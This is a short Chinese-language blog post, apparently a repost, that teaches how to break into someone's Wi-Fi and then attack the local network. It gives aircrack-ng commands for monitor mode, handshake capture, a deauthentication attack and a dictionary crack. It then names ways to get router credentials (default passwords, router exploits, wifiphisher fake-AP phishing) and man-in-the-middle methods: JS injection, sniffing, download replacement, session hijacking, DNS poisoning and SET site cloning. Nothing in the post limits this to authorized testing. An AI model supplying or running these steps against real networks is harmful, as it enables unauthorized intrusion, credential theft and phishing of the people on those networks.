wifi破解到局域網滲透

本文轉自 _博客

一，密碼破解

wifi破解最主要的仍是抓握手包破解（不要給我說某某鑰匙的「分享」）。

wifi認證主要分爲四步：

1,無線客戶端與ap鏈接時，首先發送一個認證請求包

2,ap收到請求後發送一段信息給客戶端

3,客戶端將信息加密後交給ap

4,ap檢查加密結果是否正確，正確則鏈接，反之否。

破解步驟（以aircrack-ng爲例子）：

1,將無線網卡打開至監聽模式：

airmon-ng start wlan0

2,探測無線網絡：

airodump-ng mon0

3,選擇要破解的路由器

airodump-ng -c 信道號 –bssid ap的mac -w 保存的包名 mon0

4,發送deauth攻擊，使客戶端斷開ap，而後自動重連，方便抓取握手包

aireplay-ng -0 10 -a ap的mac -c 客戶端的mac –ignore-negative-one mon0

5,破解

aircrack-ng -w 字典 以前保存的包名

也能夠使用fern-wifi-cracker這個python寫的圖形化傻瓜式一鍵破解工具。

二，局域網滲透

1,仍是路由器

知道了wifi密碼還不夠，還須要獲得撥號賬號密碼。

a)默認的賬號密碼

b)路由器漏洞 routerpwn

c)基礎認證釣魚 http://www.qq2b.net/archives/213.html
wifiphiser ：僞造熱點，而且彈出一個路由器升級提示頁面，讓你輸入密碼

2,中間人攻擊

局域網不用像內網域滲透那樣當心翼翼

1）dsploit,cain,ettercap等工具

注入js釣魚，嗅探密碼，下載替換，會話劫持，dns毒化等等配合社工效果更佳。特別細化dns毒化+set工具包的站點克隆。